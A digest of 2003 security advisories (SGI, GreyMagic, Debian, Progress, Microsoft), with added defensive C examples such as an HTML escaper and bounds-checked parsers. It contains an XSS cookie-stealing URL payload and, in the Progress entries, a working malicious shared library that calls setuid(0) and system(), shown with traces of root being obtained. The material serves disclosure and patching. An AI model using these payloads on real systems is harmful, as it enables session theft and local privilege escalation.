Risk level: medium

Type: insecure temporary file

Source of info: SGI Security Team

Impact

SGI acknowledges the compiler temporary file vulnerability reported by
Crimelabs: http://www.crimelabs.net/docs/irix-compiler-tempfile.txt and
is currently investigating.

This issue was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0578

No further information is available at this time.  As further information
becomes available, additional advisories will be issued.

Overview

SGI acknowledges the compiler temporary file vulnerability reported by
Crimelabs: http://www.crimelabs.net/docs/irix-compiler-tempfile.txt and
is currently investigating.

This issue was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0578

No further information is available at this time.  As further information
becomes available, additional advisories will be issued.

For the protection of all our customers, SGI does not disclose, discuss or
confirm vulnerabilities until a full investigation has occurred and any
necessary patch(es) or release streams are available for all vulnerable and
supported Linux and IRIX operating systems.

Until SGI has more definitive information to provide, customers are
encouraged to assume all security vulnerabilities as exploitable and take
appropriate steps according to local site security policies and
requirements.

As further information becomes available, additional advisories will be
issued via the normal SGI security information distribution methods
including the wiretap mailing list.





Cross-Site Scripting in Unparsable XML Files.

2003-06-17

Risk level: medium

Type: cross-site-scripting

Source of info: GreyMagic Software

Impact

Internet Explorer automatically attempts to parse any XML file requested
individually by the browser. When the parsing process is successful, a
dynamic tree of the various XML elements is presented. However, when a
parsing error occurs Internet Explorer displays the parse error along with
the URL of the requested XML file. 

In some cases the displayed URL is not filtered
appropriately, and may cause HTML that was passed in the querystring of the
URL to be rendered by the browser. This creates a classic cross-site
scripting attack in almost any XML file that MSXML fails to read.
Practically, this means that leaving XML files on your server that can't be
parsed correctly by Internet Explorer and MSXML is exposing the site to a
global Cross-Site Scripting attack. 

Overview

Affected applications:
======================

Microsoft Internet Explorer 5.5 and 6.0. 

Note that any other application that uses Internet Explorer's engine
(WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.). 


Introduction:
=============

Internet Explorer automatically attempts to parse any XML file requested
individually by the browser. When the parsing process is successful, a
dynamic tree of the various XML elements is presented. However, when a
parsing error occurs Internet Explorer displays the parse error along with
the URL of the requested XML file. 


Discussion: 
===========

We have found that in some cases the displayed URL is not filtered
appropriately, and may cause HTML that was passed in the querystring of the
URL to be rendered by the browser. This creates a classic cross-site
scripting attack in almost any XML file that MSXML fails to read.
Practically, this means that leaving XML files on your server that can't be
parsed correctly by Internet Explorer and MSXML is exposing the site to a
global Cross-Site Scripting attack. 

We have been able to reproduce this problem in various setups, but we
couldn't pinpoint the vulnerable component reliably enough. It is most
likely an MSXML issue, and not a flaw in Internet Explorer itself. 


Exploit: 
========

This sample shows the basic URL for injecting content: 

http://host.with.unparsable.xml.file/flaw.xml?<script>alert(document.cookie)</script>
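The missing step in the error page described above is output encoding of the echoed URL. As an added example (not GreyMagic's or Microsoft's code), an HTML escaper and an error-page renderer that applies it to the URL before echoing; the page template only mimics the "parse error plus URL" layout the advisory describes and is an assumption, as is the sample parser message.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Escapes the five HTML-significant characters so the string is rendered as
 * text, never as markup. Returns bytes written (excluding the terminator), or
 * -1 if out is too small for the escaped form. */
long html_escape(const char *in, char *out, size_t outlen)
{
    size_t used = 0;
    for (const char *p = in; *p; p++) {
        const char *rep;
        char one[2] = { *p, 0 };
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (used + rl + 1 > outlen)
            return -1;
        memcpy(out + used, rep, rl);
        used += rl;
    }
    out[used] = '\0';
    return (long)used;
}

/* Renders the parse-error page with the requested URL escaped. The reason
 * string comes from the parser, not the request, and is emitted as-is.
 * Returns 0 on success, -1 if a buffer is too small. */
int render_parse_error(const char *url, const char *reason, char *page, size_t pagelen)
{
    char safe_url[1024];
    if (html_escape(url, safe_url, sizeof safe_url) < 0)
        return -1;
    int n = snprintf(page, pagelen,
                     "<p>The XML page cannot be displayed: %s</p><p>%s</p>",
                     reason, safe_url);
    return (n < 0 || (size_t)n >= pagelen) ? -1 : 0;
}

int main(void)
{
    char page[2048];
    const char *url = "http://host/flaw.xml?<script>alert(document.cookie)</script>";
    if (render_parse_error(url, "Invalid at the top level of the document.", page, sizeof page) == 0)
        puts(page);
    return 0;
}
```

Anything reflected from the request, the URL included, must go through the escaper; the reason text is trusted here only because it originates in the parser.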


Demonstration:
==============

We put together a simple proof of concept demonstration, which can be found
at http://security.greymagic.com/adv/gm013-ie/.


Solution: 
=========

Microsoft was notified on 20-Feb-2003. They reported that they were able to
reproduce this flaw on IE6 Gold, and no other version. Our research showed
different, yet inconsistent results (see "Tested on" section for details). 


Tested on: 
==========

IE5.5 NT4.
IE6 Win98.
IE6 Win2000.






New radiusd-cistron packages fix buffer overflow (in Debian)

2003-06-14

Risk level: high

Type: Buffer overflow

Source of info: Debian Security Team

Impact

radiusd-cistron contains a bug allowing a buffer overflow when a long
NAS-Port attribute is received.  This could allow a remote attacker to
execute arbitrary code with the privileges of the RADIUS daemon (usually
root).

Overview

Problem-Type   : remote
Debian-specific: no

radiusd-cistron contains a bug allowing a buffer overflow when a long
NAS-Port attribute is received.  This could allow a remote attacker to
execute arbitrary code with the privileges of the RADIUS daemon
(usually root).
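RADIUS attributes are type-length-value triples whose length byte is attacker-controlled, which is what makes "a long NAS-Port attribute" possible. As an added example (not cistron's code), a bounds-checked attribute walk beside the unchecked copy the report describes; the vulnerable function, the 16-byte destination and the constructed Access-Request builder are assumptions for illustration, while the 20-byte header, attribute type 5 for NAS-Port and its 4-byte value are the RADIUS encoding.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RADIUS_HDR_LEN 20
#define ATTR_NAS_PORT 5

/* Vulnerable pattern (illustration of the report, not cistron's code): the
 * attribute's own length byte is trusted and its value is copied into a
 * fixed 16-byte buffer. Never call with untrusted input; here for the shape. */
int vulnerable_copy_attr(const uint8_t *attr, char *out /* 16 bytes */)
{
    uint8_t alen = attr[1];
    memcpy(out, attr + 2, alen - 2);    /* BUG: alen may be up to 255 */
    return alen - 2;
}

/* Hardened walk over the attribute list: every length is checked against the
 * encoding rule (>= 2) and against the bytes actually present; NAS-Port must
 * carry exactly 4 bytes of value. Returns 0 and fills *nas_port when a valid
 * NAS-Port is found, 1 if the attribute is absent, -1 if the packet is malformed. */
int parse_nas_port(const uint8_t *pkt, size_t len, uint32_t *nas_port)
{
    if (len < RADIUS_HDR_LEN)
        return -1;
    size_t declared = ((size_t)pkt[2] << 8) | pkt[3];
    if (declared < RADIUS_HDR_LEN || declared > len)
        return -1;
    size_t off = RADIUS_HDR_LEN;
    int found = 1;
    while (off < declared) {
        if (declared - off < 2)
            return -1;
        uint8_t type = pkt[off], alen = pkt[off + 1];
        if (alen < 2 || alen > declared - off)
            return -1;
        if (type == ATTR_NAS_PORT) {
            if (alen != 6)
                return -1;
            *nas_port = ((uint32_t)pkt[off + 2] << 24) | ((uint32_t)pkt[off + 3] << 16) |
                        ((uint32_t)pkt[off + 4] << 8) | pkt[off + 5];
            found = 0;
        }
        off += alen;
    }
    return found;
}

/* Constructed Access-Request (test input, not a capture): header plus one
 * NAS-Port attribute with the given length byte. Returns the packet length,
 * or 0 if it would not fit. A length other than 6 produces a malformed attribute. */
size_t build_request(uint8_t *buf, size_t buflen, uint8_t nas_port_len, uint32_t value)
{
    size_t total = RADIUS_HDR_LEN + nas_port_len;
    if (nas_port_len < 2 || total > buflen)
        return 0;
    memset(buf, 0, total);
    buf[0] = 1;                                   /* Code: Access-Request */
    buf[1] = 0x2a;                                /* Identifier */
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[RADIUS_HDR_LEN] = ATTR_NAS_PORT;
    buf[RADIUS_HDR_LEN + 1] = nas_port_len;
    if (nas_port_len >= 6) {
        buf[RADIUS_HDR_LEN + 2] = (uint8_t)(value >> 24);
        buf[RADIUS_HDR_LEN + 3] = (uint8_t)(value >> 16);
        buf[RADIUS_HDR_LEN + 4] = (uint8_t)(value >> 8);
        buf[RADIUS_HDR_LEN + 5] = (uint8_t)value;
    }
    return total;
}

int main(void)
{
    uint8_t buf[300];
    uint32_t port = 0;
    size_t n = build_request(buf, sizeof buf, 200, 0);   /* the oversized attribute */
    printf("oversized NAS-Port: parse=%d\n", parse_nas_port(buf, n, &port));
    n = build_request(buf, sizeof buf, 6, 0x1234);
    printf("valid NAS-Port: parse=%d value=%u\n", parse_nas_port(buf, n, &port), (unsigned)port);
    return 0;
}
```

The same walk covers every attribute type: the length byte is validated against the packet before a single value byte is read, and fixed-size attributes are checked against their expected size rather than copied at whatever length the sender claimed.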

For the stable distribution (woody) this problem has been fixed in
version 1.6.6-1woody1.

For the old stable distribution (potato), this problem will be fixed
in a later advisory.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you update your radiusd-cistron package.

Patches

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1.dsc
      Size/MD5 checksum:      611 b6a3c69ca08b1f6984147e64f7ddcaab
    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1.diff.gz
      Size/MD5 checksum:     4221 ad563e14d3f3da713973cd23e97dcef5
    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6.orig.tar.gz
      Size/MD5 checksum:   194154 16084870890fd2ec577dbe183b51a379

  Alpha architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_alpha.deb
      Size/MD5 checksum:   262652 b541753d08f0d124a9f48133eeac381e

  ARM architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_arm.deb
      Size/MD5 checksum:   235578 6277971c73bf52c22b5623f9131a8d9f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_i386.deb
      Size/MD5 checksum:   231960 9ca72ec922c0fd80e22d05a06176b265

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_ia64.deb
      Size/MD5 checksum:   365566 ea7299686e6629039ecdf81abdebd5ee

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_hppa.deb
      Size/MD5 checksum:   235502 886c9f6006c80dcf3c4c5305c76411b7

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_m68k.deb
      Size/MD5 checksum:   225678 39c53545d15bb167550fd462a139fc35

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_mips.deb
      Size/MD5 checksum:   246130 3d98988fb2128bc26735c1c5b7a41cde

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_mipsel.deb
      Size/MD5 checksum:   245672 88e63e2d94973aa7e65176b81184ed80

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_powerpc.deb
      Size/MD5 checksum:   229238 eb1d0a109bb66e3d39c902f561779afc

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_s390.deb
      Size/MD5 checksum:   238530 396c1a07cc893b3d77a1ecfcbc0ee57a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-1woody1_sparc.deb
      Size/MD5 checksum:   248882 0e39dd1a1310e1afedc4d39e2b8d2794




New mikmod packages fix buffer overflow (in Debian)

2003-06-14

Risk level: medium

Type: Buffer overflow

Source of info: Debian Security Team

Impact

Ingo Saitz discovered a bug in mikmod whereby a long filename inside
an archive file can overflow a buffer when the archive is being read
by mikmod.

Overview

Ingo Saitz discovered a bug in mikmod whereby a long filename inside
an archive file can overflow a buffer when the archive is being read
by mikmod. It is locally exploitable.

For the stable distribution (woody) this problem has been fixed in
version 3.1.6-4woody3.

For old stable distribution (potato) this problem has been fixed in
version 3.1.6-2potato3.

For the unstable distribution (sid) this problem is fixed in version
3.1.6-6.

Patches

Debian GNU/Linux 2.2 alias potato
--------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3.dsc
      Size/MD5 checksum:      595 d0a811016b5025b327eea822373f12d5
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3.diff.gz
      Size/MD5 checksum:     6207 2ce7c29ac4c12632de56a1db093982f7
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6.orig.tar.gz
      Size/MD5 checksum:   134827 71d8142ae3ae27034535913e906b1384

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_alpha.deb
      Size/MD5 checksum:    62968 0c0d4ff734a7c02e4d8c862bb3745713

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_arm.deb
      Size/MD5 checksum:    52588 7d5da70323e8549fc7cf5528173f3d1d

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_i386.deb
      Size/MD5 checksum:    50666 f00f6100852c6a25be4909e861368877

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_m68k.deb
      Size/MD5 checksum:    48942 390d71cc5d5f98e84e077961740b9608

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_powerpc.deb
      Size/MD5 checksum:    53578 ef6419433633f01244eafeb7b61d0e6c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-2potato3_sparc.deb
      Size/MD5 checksum:    54836 ca9367c16507f4ed6d247cc7001d777a

Debian GNU/Linux 3.0 alias woody
--------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3.dsc
      Size/MD5 checksum:      608 b52405fb77329efddae915e145a9751d
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3.diff.gz
      Size/MD5 checksum:     9726 35080e8530e9924be4d86aafbd31b84d
    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6.orig.tar.gz
      Size/MD5 checksum:   134827 71d8142ae3ae27034535913e906b1384

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_alpha.deb
      Size/MD5 checksum:    62712 fe5456aa0ca7a1819fd1bb87b82bde1a

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_arm.deb
      Size/MD5 checksum:    52602 d75974481a2b2e23c47a7f700bf878e5

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_i386.deb
      Size/MD5 checksum:    50578 fde5b864a91bdddf1b07720af26cf5d5

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_ia64.deb
      Size/MD5 checksum:    76108 ad1cbef734d43f5e0fa5bad3c7f1cd72

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_hppa.deb
      Size/MD5 checksum:    58482 9edb50e45214bc0b3225f5070df2b59f

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_m68k.deb
      Size/MD5 checksum:    48554 a52f8913418501bf6a4b103e14636436

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_mips.deb
      Size/MD5 checksum:    57352 4edbef3712ec7220cdbe410c61aa8406

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_mipsel.deb
      Size/MD5 checksum:    57538 f0846374f89bc626f6ed29fd82bbd4af

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_powerpc.deb
      Size/MD5 checksum:    53758 9a8e2a41cf260e5eecfd0472f2f574e6

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_s390.deb
      Size/MD5 checksum:    53038 bddc8a9dcdea2b4386b5d5a4b3d281e1

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mikmod/mikmod_3.1.6-4woody3_sparc.deb
      Size/MD5 checksum:    52786 9da2c9dc87e8c9d742483e5929c2e90f





Progress _dbagent -installdir dlopen() issue

2003-06-14

Risk level: high

Type: local root compromise

Source of info: Secure Network Operations, Inc.

Impact

Unsafe use of dlopen() allows a local root compromise.

Overview

Progress applications make use of several helper .dll and .so libraries.
When _dbagent looks for a shared object to load with dlopen(), it builds
the path from the argument passed to the "-installdir" command line
option. No verification is performed on the object found there, so a
local, non-root user can make themselves root.

This vulnerability is a variant of SRT2003-06-13-0945.txt; the only
difference is the way the application determines where dlopen() should
search.

[elguapo@rh8 9.1C]$ cat /usr/dlc/version
echo PROGRESS Version 9.1C as of Thu Jun  7 10:03:59 EDT 2001

Here "-installdir /tmp" is passed to _dbagent; the ltrace output shows the
library path being built from that value and handed to dlopen():

snprintf("/tmp/lib/librocket_r.so",303,"%s/lib/%s","/tmp","librocket_r.so") 
memset(0xbfffece0, '\000', 303)                   = 0xbfffece0
strncpy(0xbfffece0, "/tmp/lib/librocket_r.so", 303) = 0xbfffece0
dlopen("/tmp/lib/librocket_r.so", 257
This is a fake _init in the fake libjutil.so
uid=0(root) gid=500(elguapo) groups=500(elguapo)


A valid workaround for nearly any Progress security hole is to remove the
setuid bit from all Progress binaries, at the cost of whatever functionality
depended on them running as root.




Progress PATH based dlopen() issue

2003-06-14

Risk level: high

Type: local root compromise

Source of info: Secure Network Operations, Inc.

Impact

Unsafe use of dlopen() allows a local root compromise.

Overview

Progress applications make use of several helper .dll and .so libraries.
When looking for a shared object to load with dlopen(), Progress searches
the user's PATH. No verification is performed on the object found, so a
local, non-root user can make themselves root. *Most* binaries in
/usr/dlc/bin can be exploited via this method.

[elguapo@rh8 elguapo]$ ls -al /usr/dlc/bin/_proapsv
-rwsr-xr-x    1 root   root    5258733 Nov 23 02:01 /usr/dlc/bin/_proapsv

getenv("DLC")                                     = NULL
strcpy(0xbffff350, "libjutil.so")                 = 0xbffff350
memmove(0xbfffefc8, 0xbffff350, 12, 0x084a2a50, 0x084e1310) = 0xbfffefc8
access("libjutil.so", 4)                          = -1
__errno_location()                                = 0x4212a620
getenv("PATH")                                    = "/usr/local/bin:/bin...
strcat("/usr/local/bin", "/")                     = "/usr/local/bin/"
strcat("/usr/local/bin/", "libjutil.so")     = "/usr/local/bin/libjutil.so"
access("/usr/local/bin/libjutil.so", 4)           = -1
...
strcat("/home/elguapo/bin/", "libjutil.so")      = "/home/elguapo/bin/libjutil.so"
access("/home/elguapo/bin/libjutil.so", 4)        = 0

As the trace shows, the library libjutil.so is searched for in the user's PATH.

Thanks to core@bokeoa.com for giving me an example shared library
... it made exploiting this problem quite simple.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// If you wanted to get creative you can hack out some fake functions for
// use later ... but there's no need... just use _init

// Stubs for the symbols _proapsv resolves with dlsym(); they only need to
// exist so the load succeeds, _init has already done the work by then.
int ehnLogOpen(int argc, char * const argv[], const char *optstring) {
	printf("This is a fake ehnLogOpen \n");
	return 0;
}
int ehnLogClose(int argc, char * const argv[], const char *optstring) {
	printf("This is a fake ehnLogClose\n");
	return 0;
}

// Runs when the library is loaded by dlopen(), before any dlsym() lookup.
// Overriding _init this way requires building the library without the
// default crti/crtn startup objects; on current toolchains use
// __attribute__((constructor)) on an ordinary function instead.
void _init(void) {
   setuid(0);
   setgid(0);
   printf("bullshit library loaded\n");
   system("/usr/bin/id > /tmp/p00p");
   system("cat /tmp/p00p");
}

[elguapo@rh8 elguapo]$ /usr/dlc/bin/_proapsv
This is a fake ehnLogOpen
uid=0(root) gid=500(elguapo) groups=500(elguapo)
+0001%ReadUBproperties failed: WebSpeed error 10007, System error 0,
ServiceName cannot be NULL or blank (6275)#00This is a fake ehnLogClose
uid=0(root) gid=500(elguapo) groups=500(elguapo)

[elguapo@rh8 elguapo]$ /usr/bin/ltrace /usr/dlc/bin/_proapsv

With PATH unset, the trace shows the search finds nothing and the load fails:

getenv("PATH")                                    = NULL
dlopen("libjutil.so", 258)                        = NULL
...
read(3, "Could not open Dynamic Library: "..., 81) = 81
malloc(51)                                        = 0x084df718
dlerror()                                         = "libjutil.so: cannot
open shared "...
lseek(3, 649134, 0)                               = 649134
read(3, "DLL Error : %s (8014)", 81)              = 81

In the run below the binary is given a little help finding the .so by
setting PATH to /tmp. The dlsym() calls in the trace show which fake
functions the library needs to export to make the exploit work.

getenv("PATH")                                    = "/tmp"
strcat("/tmp", "/")                               = "/tmp/"
strcat("/tmp/", "libjutil.so")                    = "/tmp/libjutil.so"
access("/tmp/libjutil.so", 4)                     = 0
dlopen("/tmp/libjutil.so", 258)                   = 0x084e1840
dlsym(0x084e1840, "ehnLogOpen")                   = 0x40013414
dlsym(0x084e1840, "ehnLogClose")                  = 0x4001345e
dlsym(0x084e1840, "ehnLogWrite")                  = 0x400134a8
dlsym(0x084e1840, "ehnLogDump")                   = 0x400134f2
dlsym(0x084e1840, "ehnLogGetProperties")          = 0x4001353c
dlsym(0x084e1840, "ehnLogSetProperties")          = 0x40013586
This is a fake ehnLogOpen
uid=0(root) gid=500(elguapo) groups=500(elguapo)


A valid workaround for nearly any Progress security hole is to remove the
setuid bit from all Progress binaries, at the cost of whatever functionality
depended on them running as root.
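Both Progress entries above come down to the same defect: a setuid-root
binary lets a value the unprivileged caller controls (the user's PATH, or
the "-installdir" argument) decide which directory dlopen() loads from.
The following is an added example, not Progress code or the advisory
author's: it reproduces the unsafe lookup the ltrace output shows and puts
a hardened lookup beside it. The function names, the trusted-directory
rules and the sample paths are this example's own assumptions; it only
resolves the path and does not call dlopen().

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe lookup, modelled on the ltrace output in the advisory: walk the
   colon-separated search path and accept the first readable "dir/name".
   In a setuid binary the path comes from the unprivileged caller, so the
   caller chooses what dlopen() will load. Returns 1 and fills out on a hit. */
int unsafe_find_lib(const char *name, const char *path, char *out, size_t outlen)
{
    char copy[4096];
    if (path == NULL || strlen(path) >= sizeof copy) return 0;
    strcpy(copy, path);
    for (char *dir = strtok(copy, ":"); dir != NULL; dir = strtok(NULL, ":")) {
        int n = snprintf(out, outlen, "%s/%s", dir, name);
        if (n < 0 || (size_t)n >= outlen) continue;
        if (access(out, R_OK) == 0)     /* the access(..., 4) seen in the trace */
            return 1;
    }
    return 0;
}

/* A library directory is trusted only if root owns it and neither group
   nor others can write to it (assumed policy for this example). */
int dir_is_trusted(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    if (st.st_uid != 0) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Hardened lookup: the directory is fixed by the privileged program (never
   taken from PATH, a command line option or any other caller-controlled
   value), the name must be bare, and the file must be a root-owned regular
   file that nobody else can modify. Returns 1 and fills out on success. */
int safe_lib_path(const char *libdir, const char *name, char *out, size_t outlen)
{
    struct stat st;
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL) return 0;
    if (!dir_is_trusted(libdir)) return 0;
    int n = snprintf(out, outlen, "%s/%s", libdir, name);
    if (n < 0 || (size_t)n >= outlen) return 0;
    if (stat(out, &st) != 0 || !S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    return 1;
}

int main(void)
{
    char buf[4096];
    /* Mirrors the advisory: PATH=/tmp and a user-written /tmp/libjutil.so. */
    if (unsafe_find_lib("libjutil.so", "/tmp", buf, sizeof buf))
        printf("unsafe lookup would dlopen %s\n", buf);
    else
        printf("unsafe lookup: no libjutil.so in PATH; create /tmp/libjutil.so to see the hit\n");
    /* The hardened lookup refuses /tmp outright because it is world-writable. */
    printf("safe lookup in /tmp: %s\n",
           safe_lib_path("/tmp", "libjutil.so", buf, sizeof buf) ? "accepted" : "refused");
    return 0;
}
```

The unsafe function behaves like the trace: with PATH=/tmp and a readable
/tmp/libjutil.so it returns that path. The hardened version ignores the
environment entirely, takes the library directory from a constant the
privileged program controls, and refuses any directory that is not
root-owned or is group/world-writable, which rules out /tmp and a user's
~/bin alike. The same ownership and permission check is the minimum a
program should apply to a directory named by "-installdir" before loading
anything from it while setuid.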



Cumulative Patch for Internet Explorer (818529)

2003-06-04

Risk level: Critical

Type: Buffer overflow

Source of info: CERT

Impact

Allows an attacker to execute code of their choice.

Overview

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 6.0. 
In addition, it eliminates two newly discovered vulnerabilities: 


 - A buffer overrun vulnerability that occurs because Internet 
Explorer does not properly determine an object type returned from a 
web server. It could be possible for an attacker who exploited this 
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's website, it would be possible for the attacker 
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML email that attempted to exploit 
this vulnerability. 

 - A flaw that results because Internet Explorer does not implement 
an appropriate block on a file download dialog box. It could be 
possible for an attacker to exploit this vulnerability to run 
arbitrary code on a user's system. If a user simply visited an 
attacker's website, it would be possible for the attacker to exploit 
this vulnerability without any other user action. An attacker could 
also craft an HTML email that attempted to exploit this 
vulnerability. 

In order to exploit these flaws, the attacker would have to create a 
specially formed HTML email and send it to the user. Alternatively 
an attacker would have to host a malicious web site that contained a 
web page designed to exploit these vulnerabilities. The attacker 
would then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004 and MS03-015, this cumulative patch will 
cause window.showHelp( ) to cease to function if you have not 
applied the HTML Help update. If you have installed the updated HTML 
Help control from Knowledge Base article 811630, you will still be 
able to use HTML Help functionality after applying this patch.

Mitigating factors: 
====================
The following mitigating factors apply to both vulnerabilities 
discussed in this bulletin:


 - By default, Internet Explorer on Windows Server 2003 runs in 
Enhanced Security Configuration. This default configuration of 
Internet Explorer blocks these attacks. If Internet Explorer 
Enhanced Security Configuration has been disabled, the protections 
put in place that prevent these vulnerabilities from being exploited 
would be removed. 
 - In the Web based attack scenario, the attacker would have to host 
a web site that contained a web page used to exploit these 
vulnerabilities. An attacker would have no way to force users to 
visit a malicious web site outside of the HTML email vector. 
Instead, the attacker would need to lure them there, typically by 
getting them to click on a link that would take them to the 
attacker's site. 
 - Code that executed on the system would only run under the 
privileges of the logged in user.  

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-020.asp
http://www.microsoft.com/security/security_bulletins/ms03-020.asp



Cumulative Patch for Internet Information Service (811114)

2003-05-28

Risk level: Important

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

Allows an attacker to execute code of their choice.

Overview

This patch is a cumulative patch that includes the functionality of 
all security patches released for IIS 4.0 since Windows NT 4.0 
Service Pack 6a, and all security patches released to date for IIS 
5.0 since Windows 2000 Service Pack 2 and IIS 5.1. A complete 
listing of the patches superseded by this patch is provided below, 
in the section titled "Additional information about this patch". 
In addition to all previously released security patches, this patch 
also includes fixes for the following newly discovered security 
vulnerabilities affecting IIS 4.0, 5.0 and 5.1: 
 
 - A Cross-Site Scripting (XSS) vulnerability affecting IIS 4.0, 
5.0 and 5.1 involving the error message that's returned to advise 
that a requested URL has been redirected. An attacker who was able 
to lure a user into clicking a link on his or her web site could 
relay a request containing script to a third-party web site running 
IIS, thereby causing the third-party site's response (still 
including the script) to be sent to the user. The script would then 
render using the security settings of the third-party site rather 
than the attacker's. 

 - A buffer overrun that results because IIS 5.0 does not correctly 
validate requests for certain types of web pages known as server 
side includes. An attacker would need the ability to upload a 
Server-side include page to a vulnerable IIS server. If the 
attacker then requested this page, a buffer overrun could result, 
which would allow the attacker to execute code of their choice on 
the server with user-level permissions. 

 - A denial of service vulnerability that results because of a flaw 
in the way IIS 4.0 and 5.0 allocate memory requests when 
constructing headers to be returned to a web client. An attacker 
would need the ability to upload an ASP page to a vulnerable IIS 
server. This ASP page, when called by the attacker, would attempt 
to return an extremely large header to the calling web client. 
Because IIS does not limit the amount of memory that can be used in 
this case, this could cause IIS to fail as a result of running out 
of local memory. 
 
 - A denial of service vulnerability that results because IIS 5.0 
and 5.1 do not correctly handle an error condition when an overly 
long WebDAV request is passed to them. As a result an attacker 
could cause IIS to fail - however both IIS 5.0 and 5.1 will by 
default restart immediately after this failure. 

There is a dependency associated with this patch - it requires the 
patch from Microsoft Security Bulletin MS02-050 to be installed. If 
this patch is installed and MS02-050 is not present, client side 
certificates will be rejected. This functionality can be restored 
by installing the MS02-050 patch.

Mitigating Factors:
====================
Redirection Cross Site Scripting: 
 - IIS 6.0 is not affected. 
 - The vulnerability could only be exploited if the attacker could 
   entice another user into visiting a web page and clicking a link
   on it, or opening an HTML mail. 
 - The target page must be an ASP page, which uses 
   Response.Redirect to redirect the client, to a new URL that is 
   based on the incoming URL of current request. 

Server Side Include Web Pages Buffer Overrun 
 - IIS 4.0, IIS 5.1 and IIS 6.0 are not affected. 
